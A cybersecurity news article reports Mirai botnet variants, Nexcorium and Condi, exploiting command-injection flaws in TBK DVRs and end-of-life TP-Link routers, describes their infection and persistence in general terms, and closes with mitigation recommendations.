Threat Actors Unleash Mirai Variants via Vulnerabilities in TBK DVRs and End-of-Life TP-Link Routers

Cybersecurity researchers have issued urgent warnings regarding active exploitation campaigns leveraging critical security flaws in TBK Digital Video Recorders (DVRs) and End-of-Life (EoL) TP-Link Wi-Fi routers. These campaigns are deploying sophisticated variants of the notorious Mirai botnet, including a new iteration dubbed "Nexcorium" and another known as "Condi," turning compromised devices into powerful engines for Distributed Denial-of-Service (DDoS) attacks. Findings from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42 highlight the persistent threat posed by unpatched and unsupported Internet of Things (IoT) devices in the global cyber landscape.

The Rise of Nexcorium: Targeting TBK DVRs via CVE-2024-3721

At the forefront of these attacks is the exploitation of CVE-2024-3721, a medium-severity command injection vulnerability impacting specific TBK DVR models, including the DVR-4104 and DVR-4216. This flaw, with a CVSS score of 6.3, allows unauthorized attackers to execute arbitrary commands on vulnerable devices, paving the way for malware deployment. The current campaign, meticulously tracked by Fortinet, is primarily focused on delivering a Mirai variant known as Nexcorium.

Command injection vulnerabilities are a particularly insidious class of security flaw, enabling attackers to inject and execute system commands through improperly sanitized user input. In the context of IoT devices like DVRs, which are often connected directly to the internet for remote access, such a vulnerability creates a critical pathway for compromise. Once exploited, Nexcorium establishes a foothold, displaying a message confirming "nexuscorp has taken control," a chilling declaration of compromise.

Vincent Li, a security researcher at Fortinet, underscored the broader trend, stating, "IoT devices are increasingly prime targets for large-scale attacks due to their widespread use, lack of patching, and often weak security settings. Threat actors continue exploiting known vulnerabilities to gain initial access and deploy malware that can persist, spread, and cause distributed denial-of-service (DDoS) attacks." This statement encapsulates the core challenge facing the security of the burgeoning IoT ecosystem, where convenience often outweighs robust security practices.

A Persistent Threat: The Mirai Botnet Ecosystem

The Mirai botnet first exploded onto the cybersecurity scene in 2016, gaining infamy for orchestrating some of the largest DDoS attacks in history, most notably against DNS provider Dyn, which temporarily brought down major websites and services across the internet. Its modus operandi revolves around scanning the internet for IoT devices protected by weak or default credentials, then infecting them with malware to recruit them into a vast network of compromised "bots." These bots are then commanded by a central server to launch overwhelming traffic floods against target websites or services, rendering them inaccessible.

Since its source code was leaked in 2016, Mirai has spawned countless variants, each with its own modifications, target lists, and exploitation methods. Nexcorium, as described by Fortinet, exhibits the classic architectural hallmarks of a Mirai variant, including XOR-encoded configuration table initialization, a watchdog module designed to prevent the malware from being terminated, and a dedicated DDoS attack module capable of launching various types of assaults (UDP, TCP, and SMTP floods). This evolution demonstrates the adaptability of threat actors, who continually refine their tools to target new vulnerabilities and broaden their reach.

The exploitation of CVE-2024-3721 is not a new phenomenon. Over the past year, this same vulnerability has been a consistent vector for other malicious campaigns. Prior reports have detailed its use in deploying other Mirai variants, as well as a distinct, relatively newer botnet named RondoDox. In September 2025, CloudSEK further elaborated on a large-scale "loader-as-a-service" botnet infrastructure actively distributing RondoDox, Mirai, and Morte payloads. This infrastructure primarily relies on weak credentials and outdated flaws in a diverse array of routers, general IoT devices, and even enterprise applications, highlighting a multi-pronged attack strategy that preys on fundamental security weaknesses.

The operational mechanics of Nexcorium involve a multi-stage infection process. Upon successful exploitation of CVE-2024-3721, a downloader script is fetched and executed. This script intelligently determines the Linux system’s architecture and then retrieves the appropriate botnet payload. Once running, Nexcorium not only functions as a DDoS bot but also incorporates additional capabilities to expand its reach. It includes an exploit for CVE-2017-17215, targeting Huawei HG532 devices within the network, and a list of hard-coded usernames and passwords. These credentials are used in brute-force attacks via Telnet connections, attempting to compromise other devices on the victim’s network. Successful Telnet logins lead to shell access, persistence mechanisms (like crontab and systemd services), and communication with an external command-and-control (C2) server, awaiting instructions for DDoS operations. To further complicate analysis and removal, the malware deletes its original downloaded binary after establishing persistence.

Fortinet’s analysis concludes, "The Nexcorium malware displays typical traits of modern IoT-focused botnets, combining vulnerability exploitation, support for multiple architectures, and various persistence methods to sustain long-term access to infected systems. Its use of known exploits, such as CVE-2017-17215, along with extensive brute-force capabilities, underscores its adaptability and efficacy in increasing its infection reach." This underscores the sophistication and comprehensive nature of these contemporary IoT botnets.

Exploiting End-of-Life Devices: The TP-Link Router Vulnerability (CVE-2023-33538)

Adding another layer of concern, Palo Alto Networks Unit 42 has reported detecting active, automated scans and probes specifically targeting CVE-2023-33538. This is a command injection vulnerability (CVSS score: 8.8) affecting End-of-Life (EoL) TP-Link wireless routers. While the observed attacks were described as "flawed" and unsuccessful in achieving full compromise due to an incorrect exploitation approach, the underlying vulnerability remains real and highly critical.

The severity of CVE-2023-33538 was recognized by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which added it to its Known Exploited Vulnerabilities (KEV) catalog in June 2025. This inclusion in the KEV catalog signifies that federal agencies are required to patch this vulnerability within a specified timeframe due to its proven exploitation in the wild. While specific models were not listed in the original report, the vulnerability affects a range of older TP-Link wireless routers that are no longer receiving official security updates or support from the manufacturer.

Researchers Asher Davila, Malav Vyas, and Chris Navarrete from Unit 42 confirmed the validity of the flaw, stating, "Although the in-the-wild attacks we observed were flawed and would fail, our analysis confirms the underlying vulnerability is real. Successful exploitation requires authentication to the router’s web interface." This emphasizes that while current attempts might be clumsy, a more skilled attacker could easily refine their methods to achieve successful compromise, especially if default or weak credentials are in place.

The Mirai-like botnet malware associated with these TP-Link router attacks features numerous references to the string "Condi," indicating a distinct variant. This malware is equipped with self-update capabilities, ensuring it can evolve and adapt over time. Furthermore, it can act as a web server, potentially spreading the infection to other devices that connect to it, thereby multiplying its reach within a network. The danger posed by EoL devices is particularly acute because users often continue to operate them long after manufacturer support ceases, leaving them permanently vulnerable to newly discovered flaws or persistent exploitation of known ones.

The Broader Landscape of IoT Vulnerabilities and Botnets

The incidents involving TBK DVRs and TP-Link routers are symptomatic of a much larger problem: the precarious state of security within the vast and rapidly expanding IoT landscape. Billions of interconnected devices, ranging from smart home gadgets to industrial sensors, often come with weak default security settings, unpatched firmware, and a complete lack of long-term support. This creates an enormous attack surface for threat actors.

A significant contributor to this vulnerability is the prevalence of default credentials. Many users fail to change factory-set usernames and passwords, which are often widely known or easily guessed. This transforms what might be a limited, authenticated vulnerability into a critical, easily exploitable entry point for determined attackers. As Unit 42 aptly noted, "For the foreseeable future, the security landscape will continue to be shaped by the persistent risk of default credentials in IoT devices. These credentials can turn a limited, authenticated vulnerability into a critical entry point for determined attackers."

The economic implications of DDoS attacks are substantial. According to various industry reports, the average cost of a DDoS attack can range from tens of thousands to hundreds of thousands of dollars per hour, depending on the scale and impact on business operations. Beyond direct financial losses from downtime, companies face reputational damage, loss of customer trust, and potential regulatory fines. In 2023, the global cost of cybercrime, including DDoS attacks, was estimated to be in the trillions of dollars, underscoring the severe economic toll of such malicious activities.

Mitigation and Recommendations

Given the severe risks, immediate and proactive measures are essential for both individuals and organizations:

1. Patching and Firmware Updates: For devices that are still supported, users must regularly check for and apply the latest firmware updates. These updates frequently include critical security patches that close known vulnerabilities.
2. Replace End-of-Life Devices: The most crucial recommendation for EoL devices like the affected TP-Link routers is to replace them immediately. Continuing to use unsupported hardware is an open invitation for compromise, as no further security updates will ever be provided.
3. Strong, Unique Credentials: Change all default usernames and passwords on IoT devices, routers, and DVRs to strong, unique combinations that are difficult to guess or brute-force. Utilize a password manager to help manage complex credentials.
4. Network Segmentation: For businesses and even advanced home users, segmenting IoT devices onto a separate network (e.g., a guest Wi-Fi network or a dedicated VLAN) can prevent them from accessing more sensitive parts of the main network, limiting the potential damage if a device is compromised.
5. Firewall and Intrusion Detection Systems (IDS): Implement robust firewalls and IDS/IPS solutions to monitor network traffic for suspicious activity and block known malicious connections.
6. Disable Unnecessary Services: Turn off any services or ports on routers and IoT devices that are not essential for their operation (e.g., Telnet, UPnP if not needed).
7. Monitor for Unusual Activity: Regularly monitor network logs and device behavior for any signs of compromise, such as unusual outbound traffic or unexpected reboots.
8. Educate Users: User awareness is paramount. Educating employees and family members about the risks of IoT devices and the importance of strong security practices can significantly reduce the attack surface.

The Future of IoT Security

The ongoing exploitation of vulnerabilities in devices like TBK DVRs and EoL TP-Link routers by Mirai variants serves as a stark reminder of the persistent and evolving threat landscape. The proliferation of IoT devices, coupled with often inadequate security measures, creates a fertile ground for botnet operators. As the world becomes increasingly interconnected, the security of every device, no matter how small or seemingly insignificant, contributes to the overall resilience of the global digital infrastructure.

The challenge demands a collaborative effort from manufacturers, who must prioritize security by design and provide long-term support; from regulators, who can enforce minimum security standards; and from users, who must take responsibility for securing their own devices. Without such concerted action, the internet will continue to grapple with the specter of massive botnets, capable of disrupting critical services and undermining trust in the digital realm. The battle against IoT botnets is far from over, and vigilance remains the strongest defense.